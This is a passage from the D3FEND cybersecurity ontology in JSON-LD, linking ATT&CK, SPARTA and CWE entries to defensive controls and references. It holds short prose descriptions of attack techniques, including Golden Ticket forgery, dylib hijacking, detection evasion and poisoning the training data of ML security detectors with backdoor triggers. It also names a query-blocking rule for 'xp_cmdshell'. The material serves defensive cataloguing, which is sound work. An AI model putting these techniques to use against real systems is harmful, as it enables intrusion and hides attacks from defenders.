      "d3f:narrower": {
        "@id": "d3f:LocalAccountMonitoring"
      },
      "rdfs:label": "IA-2(4)"
    },
    {
      "@id": "d3f:T1408",
      "@type": "owl:Class",
      "d3f:attack-id": "T1408",
      "d3f:definition": "An adversary could use knowledge of the techniques used by security software to evade detection(Citation: Brodie)(Citation: Tan). For example, some mobile security products perform compromised device detection by searching for particular artifacts such as an installed \"su\" binary, but that check could be evaded by naming the binary something else. Similarly, polymorphic code techniques could be used to evade signature-based detection(Citation: Rastogi).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1630.003",
      "rdfs:label": "Disguise Root/Jailbreak Indicators - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1630.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Disguise Root/Jailbreak Indicators"
    },
    {
      "@id": "d3f:UserStartupDirectory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:UserStartupScriptFile"
      },
      "d3f:definition": "A user startup directory holds information necessary to start the users session with the system.",
      "rdfs:label": "User Startup Directory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserLogonInitResource"
        },
        {
          "@id": "_:N41e62c2ef8ca442f82bfc13689e7d647"
        }
      ]
    },
    {
      "@id": "_:N41e62c2ef8ca442f82bfc13689e7d647",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserStartupScriptFile"
      }
    },
    {
      "@id": "d3f:T1157",
      "@type": "owl:Class",
      "d3f:attack-id": "T1157",
      "d3f:definition": "macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1574.004",
      "rdfs:label": "Dylib Hijacking",
      "rdfs:seeAlso": {
        "@id": "d3f:T1574.004"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:T1195.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1195.001",
      "d3f:definition": "Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise)",
      "d3f:modifies": {
        "@id": "d3f:Software"
      },
      "rdfs:label": "Compromise Software Dependencies and Development Tools",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1195"
        },
        {
          "@id": "_:N6f8164f9864f412081776a28b2c6032c"
        }
      ]
    },
    {
      "@id": "_:N6f8164f9864f412081776a28b2c6032c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:T1558.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1558.001",
      "d3f:definition": "Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection)",
      "d3f:forges": {
        "@id": "d3f:KerberosTicketGrantingTicket"
      },
      "rdfs:label": "Golden Ticket",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1558"
        },
        {
          "@id": "_:N504499d01f0a454ea86627122d23d707"
        }
      ]
    },
    {
      "@id": "_:N504499d01f0a454ea86627122d23d707",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:forges"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KerberosTicketGrantingTicket"
      }
    },
    {
      "@id": "d3f:Reference-PlatformFirmwareResiliencyGuidelines_NIST",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-193.pdf"
      },
      "d3f:kb-abstract": "This document provides technical guidelines and recommendations supporting resiliency of platform firmware and data against potentially destructive attacks. The platform is a collection of fundamental hardware and firmware components needed to boot and operate a system. A successful attack on platform firmware could render a system inoperable, perhaps permanently, or requiring reprogramming by the original manufacturer, resulting in significant disruptions to users. The technical guidelines in this document promote resiliency in the platform by describing security mechanisms for protecting the platform against unauthorized changes, detecting unauthorized changes that occur, and recovering from attacks rapidly and securely. Implementers, including Original Equipment Manufacturers (OEMs) and component/device suppliers, can use these guidelines to build stronger security mechanisms into platforms. System administrators, security professionals, and users can use this document to guide procurement strategies and priorities for future systems.",
      "d3f:kb-author": "NIST",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "NIST",
      "d3f:kb-reference-of": {
        "@id": "d3f:FirmwareVerification"
      },
      "d3f:kb-reference-title": "Platform Firmware Resiliency Guidelines",
      "rdfs:label": "Reference - Platform Firmware Resiliency Guidelines - NIST"
    },
    {
      "@id": "d3f:Log",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A record of events in the order of their occurrence.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/06515215-n"
      },
      "rdfs:label": "Log",
      "rdfs:seeAlso": {
        "@id": "dbr:Chronology"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:D3FENDCore"
        },
        {
          "@id": "d3f:DigitalInformationBearer"
        }
      ],
      "skos:altLabel": "Chronology"
    },
    {
      "@id": "d3f:EX-0012.01",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0012.01",
      "d3f:definition": "Threat actors may target the internal registers of the victim spacecraft in order to modify specific values as the FSW is functioning or prevent certain subsystems from working. Most aspects of the spacecraft rely on internal registers to store important data and temporary values. By modifying these registers at certain points in time, threat actors can disrupt the workflow of the subsystems or onboard payload, causing them to malfunction or behave in an undesired manner.",
      "rdfs:label": "Registers - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0012"
      },
      "skos:prefLabel": "Registers"
    },
    {
      "@id": "d3f:T1071.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1071.001",
      "d3f:definition": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.",
      "d3f:may-transfer": {
        "@id": "d3f:CertificateFile"
      },
      "d3f:produces": {
        "@id": "d3f:OutboundInternetWebTraffic"
      },
      "rdfs:label": "Web Protocols",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1071"
        },
        {
          "@id": "_:Nf67771b207704b619cd15e82a2b6cb0f"
        },
        {
          "@id": "_:Nbdebc942eb634178a0f53304ebfffe26"
        }
      ]
    },
    {
      "@id": "_:Nf67771b207704b619cd15e82a2b6cb0f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-transfer"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CertificateFile"
      }
    },
    {
      "@id": "_:Nbdebc942eb634178a0f53304ebfffe26",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetWebTraffic"
      }
    },
    {
      "@id": "d3f:Reference-Wikipedia-PIRSensor",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://en.wikipedia.org/wiki/Passive_infrared_sensor"
      },
      "d3f:kb-abstract": "Background on passive infrared sensors, principles of operation, and typical deployment considerations.",
      "d3f:kb-author": "Wikipedia contributors",
      "d3f:kb-reference-of": {
        "@id": "d3f:MotionSensorMonitoring"
      },
      "d3f:kb-reference-title": "Passive infrared sensor",
      "rdfs:label": "Reference - Wikipedia: Passive infrared sensor"
    },
    {
      "@id": "d3f:RelayPatternAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RelayPatternAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "d3f:d3fend-id": "D3-RPA",
      "d3f:definition": "The detection of an internal host relaying traffic between the internal network and the external network.",
      "d3f:kb-article": "## How it works\nA relay may use a variety of proxying, forwarding, or routing technologies to bridge a protected network with an external network. A defensive analytic to detect a relay network may compare the network sessions among multiple hosts. Hosts which have nearly similar network statistics may be part of a relay network. The statistics may include number of bytes sent to and from, time of session initiation, packet size, or packet arrival time data.\n\n## Considerations\n\nComplex intranet VPNs or routing encapsulation may affect the detection analytics.  In addition, unwanted packets might not be forwarded, and additional packets may be added at the relay, further complicating detection.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MaliciousRelayDetectionOnNetworks_VECTRANETWORKSInc"
      },
      "d3f:synonym": "Relay Network Detection",
      "rdfs:label": "Relay Pattern Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:Ne636693c32e04b838eb66e6a113540d2"
        }
      ]
    },
    {
      "@id": "_:Ne636693c32e04b838eb66e6a113540d2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:Pointer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computer science, a pointer is a programming language object, whose value refers to (or \"points to\") another value stored elsewhere in the computer memory using its memory address. A pointer references a location in memory, and obtaining the value stored at that location is known as dereferencing the pointer. As an analogy, a page number in a book's index could be considered a pointer to the corresponding page; dereferencing such a pointer would be done by flipping to the page with the given page number.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Pointer_(computer_programming)"
      },
      "rdfs:label": "Pointer",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformation"
      }
    },
    {
      "@id": "d3f:CollaborativeSoftware",
      "@type": "owl:Class",
      "d3f:definition": "Collaborative software or groupware is application software designed to help people working on a common task to attain their goals. One of the earliest definitions of groupware is \"intentional group processes plus software to support them\". Collaborative software is a broad concept that overlaps considerably with computer-supported cooperative work (CSCW). According to Carstensen and Schmidt (1999) groupware is part of CSCW. The authors claim that CSCW, and thereby groupware, addresses \"how collaborative activities and their coordination can be supported by means of computer systems.\"",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Collaborative_software"
      },
      "rdfs:label": "Collaborative Software",
      "rdfs:subClassOf": {
        "@id": "d3f:UserApplication"
      }
    },
    {
      "@id": "d3f:SecondaryStorage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Secondary memory (storage, hard disk) is the computer component holding information that does not need to be accessed quickly and that needs to be retained long-term.",
      "rdfs:isDefinedBy": {
        "@id": "https://whatis.techtarget.com/definition/memory"
      },
      "rdfs:label": "Secondary Storage",
      "rdfs:seeAlso": {
        "@id": "https://en.wikipedia.org/wiki/Computer_data_storage#Secondary_storage"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "d3f:Storage"
        }
      ]
    },
    {
      "@id": "d3f:OSAPIAccessProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function for interacting with processes.",
      "d3f:invokes": {
        "@id": "d3f:AccessProcess"
      },
      "rdfs:label": "OS API Access Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N2ecca6f70fa94abea6988d4f16f0bb32"
        }
      ]
    },
    {
      "@id": "_:N2ecca6f70fa94abea6988d4f16f0bb32",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessProcess"
      }
    },
    {
      "@id": "d3f:T1195",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1195",
      "d3f:definition": "Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.",
      "d3f:modifies": {
        "@id": "d3f:DigitalArtifact"
      },
      "rdfs:label": "Supply Chain Compromise",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InitialAccessTechnique"
        },
        {
          "@id": "_:Na754d239a7284035b95ae79ba1c28385"
        }
      ]
    },
    {
      "@id": "_:Na754d239a7284035b95ae79ba1c28385",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalArtifact"
      }
    },
    {
      "@id": "d3f:ApplicationConfigurationDatabase",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:ApplicationConfigurationDatabaseRecord"
      },
      "d3f:definition": "A database used to hold application configuration data.",
      "rdfs:label": "Application Configuration Database",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ConfigurationDatabase"
        },
        {
          "@id": "_:N6ab204d8a7b14045835809695a90aa37"
        }
      ]
    },
    {
      "@id": "_:N6ab204d8a7b14045835809695a90aa37",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:CWE-285",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-285",
      "d3f:definition": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action.",
      "d3f:synonym": "AuthZ",
      "rdfs:label": "Improper Authorization",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForInternetSecurity_CylanceInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20120117644A1"
      },
      "d3f:kb-abstract": "A computer implemented method for preventing SQL injection attacks comprises intercepting a web request associated with a web service at a first software hook in a first web service execution context, persisting at least a portion of the intercepted web request in a storage location associated with the first software hook and accessible to at least one additional execution context, intercepting a database query generated by at least one web service processing operation at a second software hook associated with the execution of the query, wherein the query is generated in response to the intercepted web request and the second hook retrieves the persisted portion of the intercepted web request, comparing a portion of the persisted portion of the intercepted web request with at least a portion of the intercepted database query, and determining, prior to the query being executed, whether the query corresponds to a potential SQL injection attack.",
      "d3f:kb-author": "Derek A. Soeder",
      "d3f:kb-mitre-analysis": "This patent describes a technique for detecting SQL injection attacks. Software hooks are installed in a web service or application to intercept function calls, events, or messages that are passed between software components. Intercepted database queries associated with a web request are analyzed character by character and if it contains a character that would modify the syntax the query is rejected or sanitized. Security rules and policies may also determine rejection. For example, an administrator or developer may implement a rule that rejects any database query that is excessively long or that contains a particular string, such as \"Xp cmdshell\".",
      "d3f:kb-organization": "Cylance Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:DatabaseQueryStringAnalysis"
      },
      "d3f:kb-reference-title": "System and method for internet security",
      "rdfs:label": "Reference - System and method for internet security - Cylance Inc"
    },
    {
      "@id": "d3f:CWE-472",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-472",
      "d3f:definition": "The web application does not sufficiently verify inputs that are assumed to be immutable but are actually externally controllable, such as hidden form fields.",
      "d3f:synonym": "Assumed-Immutable Parameter Tampering",
      "rdfs:label": "External Control of Assumed-Immutable Web Parameter",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-471"
        },
        {
          "@id": "d3f:CWE-642"
        }
      ]
    },
    {
      "@id": "d3f:CCI-001199_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:DiskEncryption"
        },
        {
          "@id": "d3f:FileContentRules"
        },
        {
          "@id": "d3f:FileEncryption"
        },
        {
          "@id": "d3f:FileHashing"
        },
        {
          "@id": "d3f:LocalFilePermissions"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system protects the confidentiality and/or integrity of organization-defined information at rest.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001199"
    },
    {
      "@id": "d3f:CWE-689",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-689",
      "d3f:definition": "The product, while copying or cloning a resource, does not set the resource's permissions or access control until the copy is complete, leaving the resource exposed to other spheres while the copy is taking place.",
      "rdfs:label": "Permission Race Condition During Resource Copy",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-362"
      }
    },
    {
      "@id": "d3f:communicates-with",
      "@type": [
        "owl:ObjectProperty",
        "owl:SymmetricProperty"
      ],
      "d3f:definition": "x communicates-with y: x and y exchange signals or data bidirectionally, enabling mutual awareness, coordination, or interaction.",
      "rdfs:label": "communicates-with",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:Reference-PointerAuthenticationOnARMv8.3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.qualcomm.com/media/documents/files/whitepaper-pointer-authentication-on-armv8-3.pdf"
      },
      "d3f:kb-abstract": "The pointer authentication scheme introduced by ARM is a software security primitive that makes it much harder for an attacker to modify protected pointers in memory without being detected. In this document, we will provide more details about the Pointer Authentication mechanism, provide a security analysis, and discuss the implementation of certain software security countermeasures, such as stack protection and control flow integrity, using the Pointer Authentication primitives.",
      "d3f:kb-author": "Qualcomm Technologies, Inc",
      "d3f:kb-organization": "Qualcomm Technologies, Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:PointerAuthentication"
      },
      "d3f:kb-reference-title": "Pointer Authentication on ARMv8.3",
      "rdfs:label": "Reference - Pointer Authentication on ARMv8.3"
    },
    {
      "@id": "d3f:CWE-435",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-435",
      "d3f:definition": "An interaction error occurs when two entities have correct behavior when running independently of each other, but when they are integrated as components in a larger system or process, they introduce incorrect behaviors that may cause resultant weaknesses.",
      "d3f:synonym": [
        "Emergent Fault",
        "Interaction Error"
      ],
      "rdfs:label": "Improper Interaction Between Multiple Correctly-Behaving Entities",
      "rdfs:subClassOf": {
        "@id": "d3f:Weakness"
      }
    },
    {
      "@id": "d3f:OTDeviceManagementMessageEvent",
      "@type": "owl:Class",
      "d3f:definition": "Manage devices and their configurations.",
      "rdfs:label": "OT Device Management Message Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTEvent"
        },
        {
          "@id": "_:N0269fa30974649928c5a18cc38d70c5e"
        }
      ]
    },
    {
      "@id": "_:N0269fa30974649928c5a18cc38d70c5e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTDeviceManagementMessage"
      }
    },
    {
      "@id": "d3f:CWE-262",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-262",
      "d3f:definition": "The product does not have a mechanism in place for managing password aging.",
      "rdfs:label": "Not Using Password Aging",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1390"
      }
    },
    {
      "@id": "d3f:DNSResponseEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a DNS server responds to a query with resolution data.",
      "rdfs:label": "DNS Response Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DNSEvent"
        },
        {
          "@id": "_:N1c57fbdd2680480e88ac321362837b91"
        }
      ]
    },
    {
      "@id": "_:N1c57fbdd2680480e88ac321362837b91",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DNSQueryEvent"
      }
    },
    {
      "@id": "d3f:T0842",
      "@type": "owl:Class",
      "d3f:attack-id": "T0842",
      "d3f:definition": "Network sniffing is the practice of using a network interface on a computer system to monitor or capture information (Citation: Enterprise ATT&CK January 2018) regardless of whether it is the specified destination for the information.",
      "rdfs:label": "Network Sniffing - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSDiscoveryTechnique"
      },
      "skos:prefLabel": "Network Sniffing"
    },
    {
      "@id": "d3f:ReverseProxyServer",
      "@type": "owl:Class",
      "d3f:definition": "In computer networks, a reverse proxy is a type of proxy server that retrieves resources on behalf of a client from one or more servers. These resources are then returned to the client, appearing as if they originated from the proxy server itself. Unlike a forward proxy, which is an intermediary for its associated clients to contact any server, a reverse proxy is an intermediary for its associated servers to be contacted by any client. In other words, a proxy acts on behalf of the client(s), while a reverse proxy acts on behalf of the server(s); a reverse proxy is usually an internal-facing proxy used as a 'front-end' to control and protect access to a server on a private network.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Reverse_proxy"
      },
      "rdfs:label": "Reverse Proxy Server",
      "rdfs:subClassOf": {
        "@id": "d3f:ProxyServer"
      }
    },
    {
      "@id": "d3f:FileSetPermissionsEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the modification of a file's permissions or access control list (ACL), specifying which users or processes are granted or restricted access.",
      "rdfs:label": "File Set Permissions Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileEvent"
        },
        {
          "@id": "_:Nb8bbd95c605e4d50bb4002f48c8baddb"
        }
      ]
    },
    {
      "@id": "_:Nb8bbd95c605e4d50bb4002f48c8baddb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileCreationEvent"
      }
    },
    {
      "@id": "d3f:CWE-338",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-338",
      "d3f:definition": "The product uses a Pseudo-Random Number Generator (PRNG) in a security context, but the PRNG's algorithm is not cryptographically strong.",
      "rdfs:label": "Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-330"
      }
    },
    {
      "@id": "d3f:CWE-488",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-488",
      "d3f:definition": "The product does not sufficiently enforce boundaries between the states of different sessions, causing data to be provided to, or used by, the wrong session.",
      "rdfs:label": "Exposure of Data Element to Wrong Session",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:MediaGeneration",
      "@type": "owl:Class",
      "owl:disjointWith": {
        "@id": "d3f:Simulation"
      },
      "rdfs:label": "Media Generation",
      "rdfs:subClassOf": {
        "@id": "d3f:Generation"
      }
    },
    {
      "@id": "d3f:REC-0008.01",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0008.01",
      "d3f:definition": "Adversaries seek insight into component sources, screening levels, test histories, and configuration states to prepare pre-delivery manipulation of boards and modules. High-value details include ASIC/FPGA part numbers and stepping, security fuses and life-cycle states, JTAG/SWD access policies, secure-boot and anti-rollback configuration, golden bitstream handling, board layouts and test points, conformal coat practices, and acceptance test procedures with allowable tolerances. Knowledge of substitute/alternate parts, counterfeit screening thresholds, and waiver histories reveals where counterfeit insertion or parametric “near-miss” parts might evade detection. For programmable logic, attackers target synthesis/place-and-route toolchains, IP core versions, and bitstream encryption keys to enable hardware Trojans or debug backdoors that survive functional test. Logistics artifacts (packing lists, RMA workflows, depot addresses) expose moments when custody is thin and tamper opportunities expand.",
      "rdfs:label": "Hardware Recon - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0008/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0008"
      },
      "skos:prefLabel": "Hardware Recon"
    },
    {
      "@id": "d3f:DE-0003.12",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0003.12",
      "d3f:definition": "When security monitoring relies on AI/ML (e.g., anomaly detection on telemetry, RF fingerprints, or command semantics), the training data itself is a target. Data-poisoning introduces crafted examples or labels so the learned model embeds false associations, treating attacker behaviors as normal, or flagging benign patterns instead. Variants include clean-label backdoors keyed to subtle triggers, label flipping that shifts decision boundaries, and biased sampling that suppresses rare-but-critical signatures. Models trained on tainted corpora are later deployed as routine updates; once in service, the adversary presents inputs containing the trigger or profile they primed, and the detector omits or downranks the very behaviors that would reveal the intrusion.",
      "rdfs:label": "Poison AI/ML Training for Evasion - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/12/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DE-0003"
      },
      "skos:prefLabel": "Poison AI/ML Training for Evasion"
    },
    {
      "@id": "d3f:LinuxPtraceArgumentPTRACEATTACH",
      "@type": "owl:Class",
      "d3f:definition": "Attach to the process specified in pid, making it a tracee of the calling process.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/ptrace.2.html"
      },
      "rdfs:label": "Linux Ptrace Argument PTRACE_ATTACH",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIAccessProcess"
      }
    },
    {
      "@id": "d3f:CWE-795",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-795",
      "d3f:definition": "The product receives data from an upstream component, but only accounts for special elements at a specified location, thereby missing remaining special elements that may exist before sending it to a downstream component.",
      "rdfs:label": "Only Filtering Special Elements at a Specified Location",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-791"
      }
    },
    {
      "@id": "d3f:CWE-257",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-257",
      "d3f:definition": "The storage of passwords in a recoverable format makes them subject to password reuse attacks by malicious users. In fact, it should be noted that recoverable encrypted passwords provide no significant benefit over plaintext passwords since they are subject not only to reuse by malicious attackers but also by malicious insiders. If a system administrator can recover a password directly, or use a brute force search on the available information, the administrator can use the password on other accounts.",
      "rdfs:label": "Storing Passwords in a Recoverable Format",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-522"
      }
    },
    {
      "@id": "d3f:T1009",
      "@type": "owl:Class",
      "d3f:attack-id": "T1009",
      "d3f:definition": "Adversaries can use binary padding to add junk data and change the on-disk representation of malware without affecting the functionality or behavior of the binary. This will often increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1027.001",
      "rdfs:label": "Binary Padding",
      "rdfs:seeAlso": {
        "@id": "d3f:T1027.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:ControlFlowGraph",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A control flow graph is a representation of all possible control flow transfers within a program, typically computed at compile-time or link-time, including calls, jumps, and returns. The control flow graph can be used to compute a control flow policy that permits only the expected control flow transfers during process execution via control flow integrity mechanisms.",
      "rdfs:label": "Control Flow Graph",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformation"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-2_13",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Account Management | Disable Accounts for High-risk Individuals",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "rdfs:label": "AC-2(13)"
    },
    {
      "@id": "d3f:CWE-56",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-56",
      "d3f:definition": "The product accepts path input in the form of asterisk wildcard ('filedir*') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: 'filedir*' (Wildcard)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-155"
        },
        {
          "@id": "d3f:CWE-41"
        }
      ]
    },
    {
      "@id": "d3f:CWE-11",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-11",
      "d3f:definition": "Debugging messages help attackers learn about the system and plan a form of attack.",
      "rdfs:label": "ASP.NET Misconfiguration: Creating Debug Binary",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-489"
      }
    },
    {
      "@id": "d3f:Model-basedReinforcementLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MBRL",
      "d3f:definition": "Model-based Reinforcement Learning refers to learning optimal behavior indirectly by learning a model of the environment by taking actions and observing the outcomes that include the next state and the immediate reward. The models predict the outcomes of actions and are used in lieu of or in addition to interaction with the environment to learn optimal policies.",
      "d3f:kb-article": "## References\nModel-Based Reinforcement Learning. In *Encyclopedia of Machine Learning*, pp. 642-644. Springer, 2010.  [Link](https://link.springer.com/referenceworkentry/10.1007/978-0-387-30164-8_556#:~:text=Model%2Dbased%20Reinforcement%20Learning%20refers,state%20and%20the%20immediate%20reward).",
      "rdfs:label": "Model-based Reinforcement Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:ReinforcementLearning"
      }
    },
    {
      "@id": "d3f:REC-0001.06",
      "@type": "owl:Class",
